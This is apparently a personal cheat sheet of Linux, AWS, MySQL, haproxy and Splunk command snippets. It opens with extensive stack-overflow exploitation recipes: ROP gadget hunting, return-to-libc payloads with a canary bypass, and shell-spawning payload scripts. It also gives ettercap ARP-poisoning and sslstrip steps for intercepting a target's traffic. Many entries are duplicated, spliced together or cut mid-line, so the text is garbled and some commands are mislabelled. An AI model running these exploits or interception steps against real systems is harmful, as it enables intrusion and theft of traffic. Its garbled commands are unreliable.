Firefox/Chrome: reload tab with javascript (no extensions)
console> win1 = window.open("https://ifconfig.io");
console> timer1 = setInterval( function(){ win1.location.href="https://ifconfig.io" }, 1*60*1000 ); # every 1 min
Linux: find execve("/bin/sh") rop gadget manually
bash> ldd ./mybinary
linux-vdso.so.1 => (0x00007ffff7ffd000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c29000)
/lib64/ld-linux-x86-64.so.2 (0x0000555555554000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7c29000)
/lib64/ld-linux-x86-64.so.2 (0x0000555555554000)
bash> strings -tx /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/bash"
180543 /bin/sh
bash> objdump -M intel -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B execve | grep 180543 -A5
e9421: 48 8d 3d 1b 71 09 00 lea rdi,[rip+0x9711b] # 180543 <_libc_intl_domainname+0x242>
e9428: 48 8b 10 mov rdx,QWORD PTR [rax]
e942b: e8 00 bd fd ff call c5130 <execve>
--
--
ea379: 48 8d 3d c3 61 09 00 lea rdi,[rip+0x961c3] # 180543 <_libc_intl_domainname+0x242>
ea380: 48 8b 10 mov rdx,QWORD PTR [rax]
ea383: e8 a8 ad fd ff call c5130 <execve>
e9428: 48 8b 10 mov rdx,QWORD PTR [rax]
e942b: e8 00 bd fd ff call c5130 <execve>
--
--
ea379: 48 8d 3d c3 61 09 00 lea rdi,[rip+0x961c3] # 180543 <_libc_intl_domainname+0x242>
ea380: 48 8b 10 mov rdx,QWORD PTR [rax]
ea383: e8 a8 ad fd ff call c5130 <execve>
bash> gdb ./mybinary
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ vmmap
Start End Perm Name
0x00400000 0x00401000 r-xp /tmp/test
0x00600000 0x00601000 r--p /tmp/test
0x00601000 0x00602000 rw-p /tmp/test
0x00007ffff7a11000 0x00007ffff7bcf000 r-xp /lib/x86_64-linux-gnu/libc-2.19.so
0x00400000 0x00401000 r-xp /tmp/test
0x00600000 0x00601000 r--p /tmp/test
0x00601000 0x00602000 rw-p /tmp/test
0x00007ffff7a11000 0x00007ffff7bcf000 r-xp /lib/x86_64-linux-gnu/libc-2.19.so
....
gdb-peda$ x/3i 0x00007ffff7a11000+0xe9421
0x7ffff7afa421 <exec_comm+1281>: lea rdi,[rip+0x9711b] # 0x7ffff7b91543
0x7ffff7afa428 <exec_comm+1288>: mov rdx,QWORD PTR [rax]
0x7ffff7afa42b <exec_comm+1291>: call 0x7ffff7ad6130 <__execve>
0x7ffff7afa428 <exec_comm+1288>: mov rdx,QWORD PTR [rax]
0x7ffff7afa42b <exec_comm+1291>: call 0x7ffff7ad6130 <__execve>
Linux: 64bit returl-to-libc gets() stack overflow canary bypass # -ASLR +NX
gcc -o mybinary mybinary.c
+--------+--------+---------+-----------------+----------+------------+----------+
|AAAAAAAA|CANNARYV|QWORD PAD|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+--------+--------+---------+-----------------+----------+------------+----------+
+--------+--------+---------+-----------------+----------+------------+----------+
|AAAAAAAA|CANNARYV|QWORD PAD|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+--------+--------+---------+-----------------+----------+------------+----------+
1. find the offset N on the stack that overwirtes RIP, the CANNARY lives 16 bytes earlier
2. find address of "pop rdi;ret", system(), "sh", exit()
3. create the payload (in python)
import struct as s
sys = 0x7ffff7a57590 # sytem()
exi = 0x7ffff7a4d1e0 # exit()
cmd = 0x7ffff7a21dfe # null-terminated arg for system
pad = 0x1111111111111111 # random qword
pop = 0x400643 # pop rdi; ret
exi = 0x7ffff7a4d1e0 # exit()
cmd = 0x7ffff7a21dfe # null-terminated arg for system
pad = 0x1111111111111111 # random qword
pop = 0x400643 # pop rdi; ret
print "A"*N + "CANNARYV" + s.pack("<Q",pad) + s.pack("<Q",pop) + s.pack("<Q",cmd) + s.pack("<Q",sys) + s.pack("<Q",exi)
4. save the pattern in a file
bash> python own.py > pattern
5. run the program in gdb and patch the cannary value after gets() executes
gdb-peda$ pdisass main
Dump of assembler code for function main:
0x000000000040059d <+0>: push rbp
0x000000000040059e <+1>: mov rbp,rsp
0x00000000004005a1 <+4>: add rsp,0xffffffffffffff80
0x00000000004005a5 <+8>: mov DWORD PTR [rbp-0x74],edi
0x00000000004005a8 <+11>: mov QWORD PTR [rbp-0x80],rsi
0x00000000004005ac <+15>: mov rax,QWORD PTR fs:0x28
0x00000000004005b5 <+24>: mov QWORD PTR [rbp-0x8],rax
0x00000000004005b9 <+28>: xor eax,eax
0x00000000004005bb <+30>: lea rax,[rbp-0x70]
0x00000000004005bf <+34>: mov rdi,rax
0x00000000004005c2 <+37>: call 0x4004a0 <gets@plt>
0x00000000004005c7 <+42>: mov rdx,QWORD PTR [rbp-0x8]
0x00000000004005cb <+46>: xor rdx,QWORD PTR fs:0x28
0x00000000004005d4 <+55>: je 0x4005db <main+62>
0x00000000004005d6 <+57>: call 0x400470 <__stack_chk_fail@plt>
0x00000000004005db <+62>: leave
0x00000000004005dc <+63>: ret
End of assembler dump.
0x000000000040059d <+0>: push rbp
0x000000000040059e <+1>: mov rbp,rsp
0x00000000004005a1 <+4>: add rsp,0xffffffffffffff80
0x00000000004005a5 <+8>: mov DWORD PTR [rbp-0x74],edi
0x00000000004005a8 <+11>: mov QWORD PTR [rbp-0x80],rsi
0x00000000004005ac <+15>: mov rax,QWORD PTR fs:0x28
0x00000000004005b5 <+24>: mov QWORD PTR [rbp-0x8],rax
0x00000000004005b9 <+28>: xor eax,eax
0x00000000004005bb <+30>: lea rax,[rbp-0x70]
0x00000000004005bf <+34>: mov rdi,rax
0x00000000004005c2 <+37>: call 0x4004a0 <gets@plt>
0x00000000004005c7 <+42>: mov rdx,QWORD PTR [rbp-0x8]
0x00000000004005cb <+46>: xor rdx,QWORD PTR fs:0x28
0x00000000004005d4 <+55>: je 0x4005db <main+62>
0x00000000004005d6 <+57>: call 0x400470 <__stack_chk_fail@plt>
0x00000000004005db <+62>: leave
0x00000000004005dc <+63>: ret
End of assembler dump.
gdb-peda$ break *0x00000000004005b5
gdb-peda$ break *0x00000000004005c7
gdb-peda$ run < pattern
gdb-peda$ p $rax
$1 = 0x8393371af6b62200 <- this is the cannary value
gdb-peda$ continue
gdb-peda$ patch $rbp-0x8 0x8393371af6b62200
gdb-peda$ patch $rbp-0x8 0x8393371af6b62200
Written 8 bytes to 0x7fffffffed68
gdb-peda$ continue
Linux: 64bit return-to-libc gets() stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector mybinary.c+------------+-----------------+----------+------------+----------+
|AAAAAAAAAAAA|addr(pop rdi;ret)|addr("sh")|addr(system)|addr(exit)|
+------------+-----------------+----------+------------+----------+
note:
on 64bit arg to system() needs to be in RDI
pop rdi - load next qword from stack into RDI, ex: addr("sh")
ret - execute next instruction on the stack, ex: addr(system)
2. find address of "pop rdi;ret" rop gadget so we can pass args to functions
gdb-peda$ break main
gdb-peda$ run
gdb-peda$ ropsearch "pop rdi"
gdb-peda$ run
gdb-peda$ ropsearch "pop rdi"
0x004005b3 : (b'5fc3') pop rdi; ret
3. find address of system() and exit()
gdb-peda$ print system
gdb-peda$ print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
gdb-peda$ find "sh"
libc : 0x7ffff7a22c37 --> 0x6572687470006873 ('sh')
gdb-peda$ hexdump 0x7ffff7a22c37
0x00007ffff7a22c37 : 73 68 00 70 74 68 72 65 61 64 5f 63 6f 6e 64 5f sh.pthread_cond_
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN . "\xb3\x05\x40\x00\x00\x00\x00\x00" . "\x37\x2c\xa2\xf7\xff\x7f\x00\x00" . "<addr_of_system>" . "<addr_of_exit>"
32bit binaries pass arguments to function on the stack:
-4 | addr(param2)
-8 | addr(param1)
-12 | addr(ret)
-16 | addr(func)
64bit binaries pass arguments to function in registers:
RDI - first arg
RSI - second arg
RDX - third arg
RCX - fourth arg
R8 - fifth arg
R9 - sixth arg
Only the 7th+ arguments are passed on the stack.
Linux: 32bit return-to-libc gets() stack overflow exploit # +ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+------------+------------+----------+-----------+
|AAAAAAAAAAAA|addr(system)|addr(exit)|addr(ENVAR)|
+------------+------------+----------+-----------+
args EBP
import struct as s
import subprocess as sp
# after mybinary is started and waiting for input find addresss of libc and stack
libc = sp.Popen("cat /proc/`pidof mybinary`/maps | grep libc | head -1 | awk -F- '{ print $1 }'", shell=True, stdout=sp.PIPE).stdout.read()
stack_top = sp.Popen("cat /proc/`pidof mybinary`/maps | grep stack | awk '{ print $1 }' | awk -F- '{ print $2 }'", shell=True, stdout=sp.PIPE).stdout.read()
# find constant offset b/w libc and addr with peda "distance"
sys = hex(int(libc,16) + 262928) # addr of system() = libc + constant offset
exi = hex(int(libc,16) + 209504) # addr of exit() = libc + constant offset
env = hex(int(stack_top,16) - 60) # addr of ENVAR = top of stack - some offset
# points right at this location -60 v---------------------------------+ stack_top
# bash> cat in | env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 ENVAR=" ls -l;id;whoami;cat /root/flag" /tmp/mybinary
print "A" * 503 + s.pack("<I",int(sys,16)) + s.pack("<I",int(exi,16)) + s.pack("<I",int(env,16)) + "AAA" # python own.py > in
Linux: writing to stdin of a process after you start it
bash> mkfifo /tmp/input
bash> cat /tmp/input | myproc
bash> cat file > /tmp/input
Linux: 32bit return-to-libc stack overflow exploit # -ASLR +NX
gcc -o mybinary -fno-stack-protector -m32 mybinary.c
+--------------+--------+--------+-------------+
| AAAAAAAAAAAA |system()|ret_addr|arg_to_system|
+--------------+--------+--------+-------------+
args EBP
2. the payload will have to be in the format "A"xN + addr of system() + addr of exit() + addr of "sh"
3. find address of system() and exit()
(gdb) break main
(gdb) run
(gdb) print system
(gdb) print exit
(gdb) run
(gdb) print system
(gdb) print exit
4. find addr of "sh" string somewhere in memory ending with NULL (0x00)
(gdb) info proc map # vmmap in peda
process 3000
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /tmp/test
0x8049000 0x804a000 0x1000 0x0 /tmp/test
0x804a000 0x804b000 0x1000 0x1000 /tmp/test
0xf7e1e000 0xf7e1f000 0x1000 0x0
0xf7e1f000 0xf7fca000 0x1ab000 0x0 /lib/i386-linux-gnu/libc-2.19.so
0xf7fca000 0xf7fcc000 0x2000 0x1aa000 /lib/i386-linux-gnu/libc-2.19.so
0xf7fcc000 0xf7fcd000 0x1000 0x1ac000 /lib/i386-linux-gnu/libc-2.19.so
0xf7fcd000 0xf7fd0000 0x3000 0x0
0xf7fda000 0xf7fdb000 0x1000 0x0
0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso]
0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.19.so
0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.19.so
0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.19.so
0xfffdd000 0xffffe000 0x21000 0x0 [stack]
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x8048000 0x8049000 0x1000 0x0 /tmp/test
0x8049000 0x804a000 0x1000 0x0 /tmp/test
0x804a000 0x804b000 0x1000 0x1000 /tmp/test
0xf7e1e000 0xf7e1f000 0x1000 0x0
0xf7e1f000 0xf7fca000 0x1ab000 0x0 /lib/i386-linux-gnu/libc-2.19.so
0xf7fca000 0xf7fcc000 0x2000 0x1aa000 /lib/i386-linux-gnu/libc-2.19.so
0xf7fcc000 0xf7fcd000 0x1000 0x1ac000 /lib/i386-linux-gnu/libc-2.19.so
0xf7fcd000 0xf7fd0000 0x3000 0x0
0xf7fda000 0xf7fdb000 0x1000 0x0
0xf7fdb000 0xf7fdc000 0x1000 0x0 [vdso]
0xf7fdc000 0xf7ffc000 0x20000 0x0 /lib/i386-linux-gnu/ld-2.19.so
0xf7ffc000 0xf7ffd000 0x1000 0x1f000 /lib/i386-linux-gnu/ld-2.19.so
0xf7ffd000 0xf7ffe000 0x1000 0x20000 /lib/i386-linux-gnu/ld-2.19.so
0xfffdd000 0xffffe000 0x21000 0x0 [stack]
(gdb) find 0xf7e1f000,0xf7fca000,"sh" # find "sh" in peda
0xf7e2d469
0xf7e2e3a8
...
11 patterns found.
0xf7e2e3a8
...
11 patterns found.
(gdb) x/s 0xf7e2d469
0xf7e2d469: "sh"
5. create the payload (with perl) - this will only work with gets() as strcpy() ignores NULL bytes
print "A"xN."<addr_of_system>"."<addr_of_exit>"."\x69\xd4\xe2\xf7"
Linux: shellcode repo
http://shell-storm.org/shellcode/
Linux: basic stack overflow exploit # -ASLR -NX
gcc -o mybinary -fno-stack-protector -z execstack -m32 mybinary.c
+--------------+-----+-----------+
| AAAAAAAAAAAA | RET | SHELLCODE |
+--------------+-----+-----------+
args EBP
Running your program with identical stacks in the terminal and in gdb:
bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 /bin/bash -c "(cat exploit; cat) | /tmp/mybinary"
bash> env -i PWD="/tmp" SHELL="/bin/bash" SHLVL=0 gdb /tmp/mybinary"
Within gdb, make sure to unset env LINES and env COLUMNS
Linux: ASM: stack frame
Apache: mod_rewrite simulator
#httpd.conf
ServerSignature Off
ServerTokens Prod
AWK: Remove duplicate lines from a file:
bash> awk '!x[$0]++' file.txt
AWS: CLI: Environment variables
bash> AWS_ACCESS_KEY_ID=XXX AWS_SECRET_ACCESS_KEY=XXX aws s3 ls
AWS: ELB: Converting certificate private key into PEM format acceptable by ELB
bash> openssl rsa -in my-openssl-pk -outform PEM > my-openssl-pk.pem
AWS: S3: URL for S3 buckets
http://bucket_name.s3.amazonaws.com/
AWS: S3: IAM policy for granting full access to a single bucket from a specific IP range
{
"Statement": [
{
"Effect": "Allow",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": "arn:aws:s3:::*",
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}
If you get this error first in the parameter group for the RDS you're importing into try setting "
mysql> GRANT ALL ON `%`.* TO user@'%' IDENTIFIED BY 'password';
AWS: RDS: MySQL: Rotate mysql.general_log and mysql.slow_log table
log /dev/log local1 info
###
# rsyslog.conf
# if haproxy logs are also being written to /var/log/messages you can exclude them
*.info;mail.none;authpriv.none;cron.none;local1.none /var/log/messages
###
# rsyslog.d/10-haproxy.conf
$AddUnixListenSocket /var/lib/haproxy/dev/log # if haproxy is being chrooted to /var/lib/haproxy, run: mkdir /var/lib/haproxy/dev
if $programname startswith 'haproxy' then /var/log/haproxy.log
&~
###
global
stats socket /var/lib/haproxy/stats mode 600 level admin
###
Linux: rsyslog: disable rate limit
# /etc/rsyslog.conf
$SystemLogRateLimitInterval 0
$SystemLogRateLimitBurst 0
###
Linux: Sysctl: enable VM address space layout randomization
"Statement": [
{
"Effect": "Allow",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": "arn:aws:s3:::*",
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}
AWS: S3: Bucket policy for granting full access to a single bucket from a specific IP range
{
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": [ "arn:aws:s3:::*" ],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}
AWS: RDS: MySQL: Import Issue
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": ["s3:GetBucketLocation", "s3:ListAllMyBuckets"],
"Resource": [ "arn:aws:s3:::*" ],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:*",
"Resource": [ "arn:aws:s3:::bucket_name", "arn:aws:s3:::bucket_name/*"],
"Condition": {
"IpAddress": { "aws:SourceIp": ["1.1.1.1/16", "2.2.2.2/30"] }
}
}
]
}
AWS: RDS: MySQL: Import Issue
ERROR 1227 (42000) at line X: Access denied; you need (at least one of) the SUPER privilege(s) for this operation
If you get this error first in the parameter group for the RDS you're importing into try setting "
log_bin_trust_function_creators
= 1". If that does not help than the DEFINER statement in your trigger definition is wrong. Open the sql file with vim and go to line X. See what DEFINER statement looks like and either correct it so it matches the user you're importing as or just delete it completely (:%s/DEFINER=`user`@`host`//g). The import should work now.
AWS: RDS: MySQL: Grant all privileges to DB user
Generally "GRANT ALL ON *.*" on RDS will fail because the root account does not have SUPER user privileges. MySQL however allows the use of `%` or "_" as wildcards for the database, which will allow GRANT on all of the user-created databases and tables.mysql> GRANT ALL ON `%`.* TO user@'%' IDENTIFIED BY 'password';
AWS: RDS: MySQL: Rotate mysql.general_log and mysql.slow_log table
mysql> CALL mysql.rds_rotate_general_log;
mysql> CALL mysql.rds_rotate_general_log;
AWS: RDS: MySQL: Skip a SQL operation if replication gets stuck
1. Connect with mysql command to slave
2. CALL mysql.rds_skip_repl_error;
Git: Permanently cache credentials
For buildmachines it's useful to permanently cache the git service account
bash> git config --global credential.helper store
bash> git config --global credential.helper store
Haproxy: Setup logging properly through rsyslogd
# haproxy.cfglog /dev/log local1 info
###
# rsyslog.conf
# if haproxy logs are also being written to /var/log/messages you can exclude them
*.info;mail.none;authpriv.none;cron.none;local1.none /var/log/messages
###
# rsyslog.d/10-haproxy.conf
$AddUnixListenSocket /var/lib/haproxy/dev/log # if haproxy is being chrooted to /var/lib/haproxy, run: mkdir /var/lib/haproxy/dev
if $programname startswith 'haproxy' then /var/log/haproxy.log
&~
###
Haproxy: Maintenance mode on demand
# haproxy.cfgglobal
stats socket /var/lib/haproxy/stats mode 600 level admin
###
bash> mkdir -p /var/lib/haproxy/
# install socat tool
bash> echo "disable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
bash> echo "enable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
Linux: bash: parallel runs of a process in N batches
bash> echo "disable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
bash> echo "enable server <backend>/<server-name>" | socat stdio /var/lib/haproxy/stats
LDAP: ldapsearch
bash> ldapsearch -x -h 1.2.3.4 -D "CN=My Name,OU=Mailboxes,DC=company,DC=com" -W -b 'CN=John Doe,OU=Mailboxes,DC=company,dc=com';
bash> ldapsearch -x -h ad.mydomain.com -D "username" -W password -b "OU=Users, OU=Myorg, dc=mydomain, dc=com";
Linux: bash: parallel runs of a process in N batches
#!/bin/bash
N=4; i=1 # 3 parallel threads
(
for thing in a b c d e f g; do
((i=i%N)); ((i++==0)) && wait
my-cmd ${thing} &
done
)
Linux: rsyslog: disable rate limit
# /etc/rsyslog.conf
$SystemLogRateLimitInterval 0
$SystemLogRateLimitBurst 0
###
Linux: Sysctl: enable VM address space layout randomization
# in /etc/sysctl.conf
kernel.randomize_va_space = 2
Linux: IPTABLES: Connection throttling
Drop incoming connections which make more than 5 connection attempts on port 22 within 60 seconds:
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 -j DROP
Linux: IPTABLES: Block by matching string
kernel.randomize_va_space = 2
Linux: IPTABLES: Connection throttling
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --set
bash> iptables -I INPUT -p tcp --dport 22 -i eth0 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 -j DROP
Linux: IPTABLES: Block by matching string
Block DNS resolution for a domain containing "firefox"
bash> iptables -A OUTPUT -p udp -m upd --dport 53 -m string --string "firefox" --algo bm -j REJECT
Block HTTPS connections with "googleuser" in URL
bash> iptables -A OUTPUT -p tcp -m tcp --dport 443 -m string --string "googleuser" --algo bm -j REJECT
MSSQL: Find out what IP address you're connecting from
SELECT client_net_address FROM sys.dm_exec_connections WHERE session_id = @@spid
MySQL: Obtain a copy of the database for setting up a replica (with minimal locking)
bash> mysqldump --databases --master-data --routines --single-transaction my_db_name > my_db_name.sql
MySQL: Make a backup without locking the database (for InnoDB engine only)
SELECT client_net_address FROM sys.dm_exec_connections WHERE session_id = @@spid
MySQL: Obtain a copy of the database for setting up a replica (with minimal locking)
bash> mysqldump --databases --master-data --routines --single-transaction my_db_name > my_db_name.sql
MySQL: Make a backup without locking the database (for InnoDB engine only)
bash> mysqldump --single-transaction --routines my_db_name > my_db_name.sql
MySQL: Skip a SQL operation if replication gets stuck
Connect with mysql command to slave
MySQL: Skip a SQL operation if replication gets stuck
Connect with mysql command to slave
mysql> SHOW SLAVE STATUS \G
mysql> STOP SLAVE;
mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;
mysql> START SLAVE;
OpenSSH: Generate Public key from a Private key
bash> ssh-keygen -y -f id_rsa > id_rsa.pub
mysql> STOP SLAVE;
mysql> SET GLOBAL SQL_SLAVE_SKIP_COUNTER = 1;
mysql> START SLAVE;
OpenSSH: Generate Public key from a Private key
bash> ssh-keygen -y -f id_rsa > id_rsa.pub
OpenSSL: Generate Self-Signed SSL certificate
bash> openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1234
OpenSSL: Encrypt a string using AES-128-CBC and base64 encode it
bash> openssl aes-128-cbc -K <encryption_key_hex> -iv <initialization_vector_hex> -in file.orig -a
Splunk: UF: Renaming Hosts
Method 1: To change the host name reported on the Splunk Web UI, on the forwarding agent edit the following file "/opt/splunkforwarder/etc/system/local/inputs.conf" then restart the splunk agent.
Method 2: After changing the hostname for a machine or before making an AMI make sure to stop splunk forwarder and run:
bash> splunk clone-prep-clear-config
Splunk: UF: Check Status of Universal Forwarder
On the machine running the Splunk Universal Forwarder open a browser and go to:
https://localhost:8089/services/admin/inputstatus/TailingProcessor:FileStatus
Splunk: UF: Check Status of Universal Forwarder
On the machine running the Splunk Universal Forwarder open a browser and go to:
https://localhost:8089/services/admin/inputstatus/TailingProcessor:FileStatus
Or from the command line:
/opt/splunkforwarder/bin/splunk _internal call /services/admin/inputstatus/TailingProcessor:FileStatus
Splunk: UF: Reindex all files on a host
2. On the machine with the Universal Forwarder - delete the fishbucket: rm -rf /opt/splunkforwarder/var/lib/splunk/fishbucket && /etc/init.d/splunk restart
NOTE
If files monitored by splunk UF have not had any logs in them in the last few hours you might need to "echo "test" >> monitored_log_file" before step 2 above will work
Splunk: UF: Autoscaling
When running the Splunk UF on an ASG you can't use the IP address or hostname of the instances for controlling things on the Splunk deployment server, instead you can use the clientName. Here's now you set it up on the UF# add below lines to /opt/splunkforwarder/etc/system/local/deploymentclient.conf
[deployment-client]
clientName = my-host-name
TAR: copy directory to another server and preserve permissions
bash> tar cf - /my/dir | ssh user@host tar xf - -C /your/dir
TeamPass: Custom improvements
items.load.php:> ZeroClipboard.setMoviePath("<?php echo $_SESSION['settings']['cpassman_url'];?>/includes/js/zeroclipboard/ZeroClipboard.swf");
< ZeroClipboard.setMoviePath("https://teampass.ecs.autodesk.com/teampass/includes/js/zeroclipboard/ZeroClipboard.swf");
items.php:> id="pw_size" value="8"
> id="edit_pw_size" value="8"
< id="pw_size" value="16"
< id="edit_pw_size" value="16"
Ubuntu: Disable upstart job from running at boot time
# echo 'manual' > /etc/init/SERVICE.override
bash> echo 'manual' > /etc/init/rpcbind.override
Ubuntu: Upstart init script template
#/etc/init/nodejs.conf
description "node"
author "admin@company.com"
respawn
respawn limit 20 5
start on runlevel [2345]
stop on runlevel [^2345]
# set limit on number of opened files
limit nofile 65535 65535
script
Ubuntu: Upstart init script template
#/etc/init/nodejs.conf
description "node"
author "admin@company.com"
respawn
respawn limit 20 5
start on runlevel [2345]
stop on runlevel [^2345]
# set limit on number of opened files
limit nofile 65535 65535
script
exec sudo -u www-data NODE_ENV=prod /usr/bin/nodejs /var/www/server.js >> /var/log/nodejs.log 2>&1
end script
###
Ubuntu: Systemv init script templat
end script
###
Ubuntu: Systemv init script templat
e
#/etc/init.d/my_service
### BEGIN INIT INFO
# Provides: my_service
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Description: Start my_service at boot time
### END INIT INFO
SERVICE="my_service"
CMD=/usr/bin/my_service
case $1 in
"start")
echo "Starting $SERVICE"
;;
"stop")
echo "Stopping $SERVICE"
;;
"restart")
echo "Restart $SERVICE"
;;
"status")
echo "$SERVICE Status"
pidof $CMD
;;
*)
echo "Invalid Option"
echo "Valid Options: start|stop|restart|status"
;;
esac
###
To enable my_service to start/stop automatically run the following:
bash> update-rc.d my_service defaults
bash> update-rc.d my_service enable
Ubuntu: Duo Authentication
# create /etc/apt/sources.list.d/duosecurity.list containing the line below
### BEGIN INIT INFO
# Provides: my_service
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Description: Start my_service at boot time
### END INIT INFO
SERVICE="my_service"
CMD=/usr/bin/my_service
case $1 in
"start")
echo "Starting $SERVICE"
;;
"stop")
echo "Stopping $SERVICE"
;;
"restart")
echo "Restart $SERVICE"
;;
"status")
echo "$SERVICE Status"
pidof $CMD
;;
*)
echo "Invalid Option"
echo "Valid Options: start|stop|restart|status"
;;
esac
###
To enable my_service to start/stop automatically run the following:
bash> update-rc.d my_service defaults
bash> update-rc.d my_service enable
Ubuntu: Duo Authentication
# create /etc/apt/sources.list.d/duosecurity.list containing the line below
deb http://pkg.duosecurity.com/Ubuntu trusty main
curl -s https://www.duosecurity.com/APT-GPG-KEY-DUO | sudo apt-key add -
apt-get update && apt-get install duo-unix
# edit /etc/pam.d/common-auth and add the following line AFTER pam_deny.so line
auth requisite /lib64/security/pam_duo.so
### edit /etc/ssh/sshd_config
UsePAM yes
ChallengeResponseAuthentication yes
UseDNS no
# decide what to do about pubkey authentication as if that succeeds SSH skips PAM
# add below to the end of sshd_config to allow ssh keys only from restricted networks
PubkeyAuthentication no
Match Address 1.1.1.1/16,2.2.2.2/16
PubkeyAuthentication yes
###
curl -s https://www.duosecurity.com/APT-GPG-KEY-DUO | sudo apt-key add -
apt-get update && apt-get install duo-unix
# edit /etc/pam.d/common-auth and add the following line AFTER pam_deny.so line
auth requisite /lib64/security/pam_duo.so
### edit /etc/ssh/sshd_config
UsePAM yes
ChallengeResponseAuthentication yes
UseDNS no
# decide what to do about pubkey authentication as if that succeeds SSH skips PAM
# add below to the end of sshd_config to allow ssh keys only from restricted networks
PubkeyAuthentication no
Match Address 1.1.1.1/16,2.2.2.2/16
PubkeyAuthentication yes
###
bash> service ssh restart
VLC: capture one frame (25fps) from a webcam and save it in png
bash> vlc v4l2:// --vout=dummy --aout=dummy --intf=dummy --video-filter=scene --scene-format=png --scene-ratio=25 --scene-width=384 --scene-height=288 --run-time=1 --scene-prefix=frame --scene-path=/path/vlc-capture/ vlc://quit
Convert png to gd2 for nagios:
bash> pngtogd2 image.png image.gd2 0 1;
0 = chunk size
1 = no compression (raw)
Ettercap arp mitm between gw and target and save traffic to a file:
bash> ettercap -Tq -M arp -i eth0 -w traffic.out /1.1.1.1/ /2.2.2.2/;
-T = text
-q = quiet
-i = interface
-w = file
/1.1.1.1/ = gw
/2.2.2.2/ = target
sslstrip
1. bash> echo "1" > /proc/sys/net/ipv4/ip_forward; # enable IP forwarding
2. bash> iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000; # redirect all tcp traffic from port 80 to localhost port 10000 (to sslstrip)
3. run sslstrip
4. bash> ettercap -T -M arp -i eth0 -o /1.1.1.1/ /2.2.2.2/; # perform arp poisoning only
Find
bash> find / -name -exec ls -l '{}' ';'
bash> find / -name -exec ls -l {} \;
bash> find / -type f -mtime +4w -exec rm -rf {} \; # delete all files older than 4 weeks
bash> find / -name -exec cat {} >>out \; # output content of found files to file out
bash> tar cf archive.tar $(find . -name myfiles*); # tar all myfiles found into archive.tar
SSH: Socks proxy over ssh
bash> ssh -C -D 1080 user@host
set browser to use 127.0.0.1:1080 as socks server and all web traffic will be going through the ssh tunnel
pppd
bash> pppd noauth 192.168.0.1:192.168.0.2 pty 'ssh user@host -t "pppd noauth"';
this will create a ppp tunnel with IPs 192.168.0.1:192.168.0.2 between localhost and host you ssh into
sed
#search for 'PATTERN ABC' and return 'ABC'
bash> VAL=`sed -n 's/.*PATTERN \([A-Z][A-Z][A-Z]\).*/\1/p' test.txt`;
# group needed match with () then reuseit with \1 OR reuse entire match with &
bash> sed 's/text\([A-Z].*\)text/\1/' test.txt;
example: if test.txt contains textHELLOtext, running the above command will output: HELLO or textHELLOtext if you use & instead of \1
grep
# find text across multiple lines with regex - (?s) makes .* match new lines
bash> grep -Pz -o '(?s)PAT1.*PAT2'
perl
